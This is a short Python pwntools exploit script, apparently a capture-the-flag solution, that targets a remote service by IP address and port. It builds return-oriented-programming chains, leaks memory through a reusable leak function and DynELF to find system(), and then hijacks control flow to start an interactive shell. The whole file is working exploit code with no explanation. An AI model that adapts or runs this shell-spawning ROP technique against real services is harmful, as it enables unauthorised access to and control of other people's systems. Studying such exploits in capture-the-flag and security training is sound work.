- from pwn import *
- HOST, PORT = "49.236.136.140", "15010"
- # HOST, PORT = "0.0.0.0", 31337
- r = remote(HOST, PORT)
- def ii(x): return r.sendline(str(x))
- read = u32(r.recvn(4))
- def rop(ptr, a, b, c):
- return 'a' * 8 + p32(0x10578) \
- + p32(0) + p32(ptr) + p32(0) + p32(a) + p32(b) + p32(c) + p32(0) + p32(0x1055c) \
- + p32(0) * 7 + p32(0x104f8)
- payload = 'sh\x00'
- def init():
- global r
- r.send(rop(0x2100c, 0, 0x21018, 8 + len(payload)))
- time.sleep(1)
- r.send(p32(0x102ec) + p32(0x10324) + payload)
- init()
- def leak(addr):
- global r
- r.send((rop(0x2101c, 1, addr, 0x10)))
- try:
- data = r.recv(1024)
- except:
- r.close()
- r = remote(HOST, PORT)
- init()
- return leak(addr)
- print hex(addr), `data`
- return data
- print hex(read)
- d = DynELF(leak, read)
- system = d.lookup('system')
- r.send(rop(0x2100c, 0, 0x21018, 4))
- time.sleep(1)
- r.send(p32(system))
- pause()
- r.send(rop(0x21018, 0x21020, 0, 0))
- r.interactive()